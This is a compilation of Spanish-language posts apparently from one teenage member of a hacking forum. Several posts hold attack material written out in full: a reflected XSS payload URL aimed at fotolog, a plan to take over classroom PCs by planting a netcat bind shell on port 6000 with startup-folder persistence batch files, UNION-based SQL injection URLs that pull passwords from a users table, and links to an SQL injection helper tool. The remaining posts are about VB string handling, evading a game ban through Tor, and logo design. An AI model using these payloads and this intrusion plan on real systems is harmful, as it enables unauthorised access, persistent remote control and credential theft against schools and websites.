Así es, justo llendome a dorimir, hago un pruebita para ver si fotolog tenia algunas restricciones de caracteres: pero me encontre en una que no las tenia.

y bueno aqui esta:

http://account.fotolog.com/language?redirect=%22%3E%3Cscript%3Ealert%28%22XSS%20encontrado%20por%20fede_cp%22%29%3C/script%3E


saludos!

Gente, este es un post, en el que venía pensando hace tiempo y bueno, aca lo estoy haciendo. Trata de algo asi como una anecdota, o
algo "planeado" para una intrusion en las PC, de las computadoras de la escuela en la clase de informatica en la clase (no intervenir
desde una casa), para despues molestar o simplemente para matar el aburrimiento en la clase.

Esto podría ser:Un acto verídico (ya pasado), algo todavía no realizado (pero real).

NO romper lo siguiente: No se puede inventar el "escenario". Es decir algo que pasó o un escenario existente (no revelar cual XD).


Bueno empiezo con el mío:

14 computadoras (corriendo windows), en red (cable ), una maquina server (windows server 2000)

Resulta que en clase empeze a pensar alguna forma de ir teniendo el control de las Pc de la clase, lo primero que se me ocurrió ( y que tengo bien claro)
es el netcat, hacer multiples conexiones (directas), hacia mi PC, y ahi tener una shell, y por ende, una especia de control total
comenzé a investigar, y se encontraban algunas carpetas compartidas, y razoné que se podría "sacar jugo", entonces fui a la carpeta compartida
y luego hice 3 archivos(en mi casa los cree obviamente), dos, tienen que estar en la pc vicitma.

1º archivo:coloca el netcat en system32 y se ejecuta
2º archivo:se registra la ejecucion de un archivo (netcat a la escucha), que esta en una carpeta compartida

ejecuto los 2 archivos, y entonces estaría funcionando, la mision, solo hace falta hacer un: net view, y conectarse

pero para la ejecucion de estos archivos tiene que ser por acceso fisico (que no es un gran problema, es solo ir a la carpeta compartida
y ejecutarlos).

ARCHIVOS:
1º archivo:coloca el netcat en system32 y se ejecuta.

lo tengo en .exe (lo compile con el quick batch compiler)
es facil su funcionamiento copia de %MYFILES% a system32
y lo ejecuta

2º archivo:se registra la ejecucion de un archivo (netcat a la escucha), que esta en una carpeta compartida.

@echo off
copy "D:\Misdoc\fede\intrusion escuela\base.bat" "%userprofile%\Men£ Inicio\Programas\Inicio\"
exit

simplemente eso.

3º archivo:ejecucion de un archivo (netcat a la escucha)

@echo off
start nc.exe -L -d -e cmd.exe -p 6000
exit

simplemente eso.

Diagrama:


Como pueden ver es muy sencillo, programitas programados en batch.

si se preguntan porque los primeros dos archivos no los hice en uno solo:es porque ya lo habia intentado antes y me daba
siempre algún error.

asique decidi hacerlo por partes.

bueno aca termina, espero que no sea la ultima anecdota, o plan de intrusión.
en mi caso, todos los datos son veridicos, pero todavía no fue probado, vuelvo de un viaje y lo pruebo.

si no tienen ninguna anecdota lo que pueden hacer es como mejorrar, o facilitar, o para no tener que estar fisicamente en la pc ¬¬, a los planes estos, y si se llego hacer en la realidad por favor decir como salió todo obviamente.


PD: tengo 14 años dentro de todo esta bien jajaja
saludos

Bueno gente, se me pasó un poco la "fecha de entrga" de la nueva version de sql injection helper  .
Esta version es la 2.0, se han arreglado mas de 10 errores, alertas de sobrecargo (en el caso de ennumerar) y se han agregado algunas cosillas más.

una vez mas:
Se trata de una herramienta "ayudante" para las sql injections, no automatiza la sql injection, sino que por ejemplo: para enumerar 30 columnas, pones la primera y las enumera solas, en las columnas transforma el nombre de la tabla en ascii, y la coloca automaticamente.

Es básicamente para el que está aprendiendo y el que no tambien, pero repito de nuevo no automatiza las consultas y te dice el admin y ya esta  , solamente es un compañero que te ayuda.

Tambien en esta nueva version, tiene una nueva herramienta que lo que hace es sacar información útil para realizar una consulta exitosa, tambien tiene para sacar el cartelito "ilegal..."

Bueno dejo los tips de las funciones:

*Enumeracion de columnas.
*Realiza la consulta para imprimir las tablas
*realiza las consulas para imprimir las columnas
*transforma la tabla en ascii
*dir de la Bd
*version de la bd (muy importante)
*nombre de la Bd

Imagenes:




Como dije antes: Es un programa muy basico, principalmente se base en el tratamiente de cadenas de texto y algunas funciones más que estan buenas.
Proximamente saldrá la version 2.1 un poco mas depurada y tmabien resueltos más errores.

para los que quieren ver el codigo: esta todo "sucio" ya que queria presentarlo de una vez por todas, la proxima version estará en limpio 

El programa es muy útil para principiantes; resuelve muchas dudas.

Links:

Programa : http://www.megaupload.com/?d=0YGKNOET

Codigo fuente [vb 6.0] : http://www.megaupload.com/?d=97AE7CZ0

hola todos, les traigo la siguiente consulta, un amigo me pidio si me hechaba una mano para ver si podia safar que quiebre su equipo en un jueguito online, es posible ( si se tiene mas de un equipo) entrar a uno de estos con un proxy (tal como TOR) y hacer que no te descubran... o directamente no te dejan entrar con proxy... o que pasaria??

podria ser una solucion.. ( el equipo esta casi 7000 en el ranking mundial ( mas de un millon y medio)) jajaja


espero que me puedan ayudar.

saludosª!!

Estaría bueno que haya una funcion para que, cada uno elija los mensajes que quiera que le aparezcan como nueva respuesta, ya que por ejemplo, siempre se me renueva el de "presentate aqui si eres nuevo"  ,, ajja

eso estaria bueno que lo implementen

saludos!

jeje es un truco algo bobo, pero tardas menos tiempo al hacer la consulta

es asi:
por ejemplo: al igual que listas tablas con :limit 1,1

tambien podes listar por ejemplo si tiene usuarios en vez de : wehere id = 1

podes hacer limit 1,1

ej:

www.ejemplo.com/notiicas.php?id=1,2,3,usuarios,5,6,pass from usuarios where id = 1

tmabien podes hacer

www.ejemplo.com/notiicas.php?id=1,2,3,usuarios,5,6,pass from usuarios limit 1,1

yta se que no tiene mucha importancia.

pero porai a alguien le sirve, o solamente para aprender

saludos!

bueno gente, la verdad que me quede trabado en una cosa, resulta que estoy haciendo una aplicacion que trabaja con cadenas de texto. y resulta que necesito haer un replace pero solo en una parte de la cadena

osea trabaja asi: ahce un for to, hacia un numero x, los numeros se ordenan separados con comas y despues con un command, de esa cadena reemplazar solo un numero. por ej:

queda en el text:

1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23

y lo que hice fue hacer un replace a por ejemplo 1 ... text1.text = replace(text1.text , 1, "table_name")

pero me va a reemplazar a todos los 1, eso lo solucione agregando replace(text1.text , 1 & "," & 2, "table_name") pero en 21,22 me queda: 2table_name,2

entienden lo que quiero hacer??

estuve todo una semana buscando, pero no encuentro una funcion similar

la verdad que estoy trabado :S

Bueno Gente en estos último 3 dias, estuve haciendo una herramienta que iba a ser de uso personal pero la comparto en el foro.
Se trata de una herramienta "ayudante" para las sql injections, no automatiza la sql injection, sino que por ejemplo:para enumerar 30 columnas, pones la primera y las enumera solas, en las columnas transforma el nombre de la tabla en ascii, y la coloca automaticamente.

Es básicamente para el que está aprendiendo y el que no tambien, pero repito de nuevo no automatiza las consultas y te dice el admin y ya esta  , solamente es un compañero que te ayuda.

obviamente este version es muy básica, en la proxima version va a tener: anti restricciones, concat, pondras la url y apartir de ahi trabaja (sin automatizar la consulta).

Utilidades:
*Enumeracion de columnas.
*Realiza la consulta para imprimir las tablas
*realiza las consulas para imprimir las columnas
*transforma la tabla en ascii

screen form inicial


Sreen ejemplo:


Link: Descargar Sql injection Helper Aqui!

PD: no es mas version Beta, es la version 1.0 ofiicial, fueron reparados algunos errores.
Es una herramienta muy sencilla, pero en una de esas te sirve.

saludos!

se lo digo a ustedes que conocen al photoshop como la palma de su mano, hice lo que pude con el fondo(si hay consejos o idea bienvenidas sean )
el logo me quedo bastante bien, el tema es el fondo

el blog es www.elhackerblog.blogspot.com

saludos

alguno de por aca debe saber que fuente se utilizo para hacer el logo de elhacker.net, alguien tiene idea,porque no la encuentro.

saludos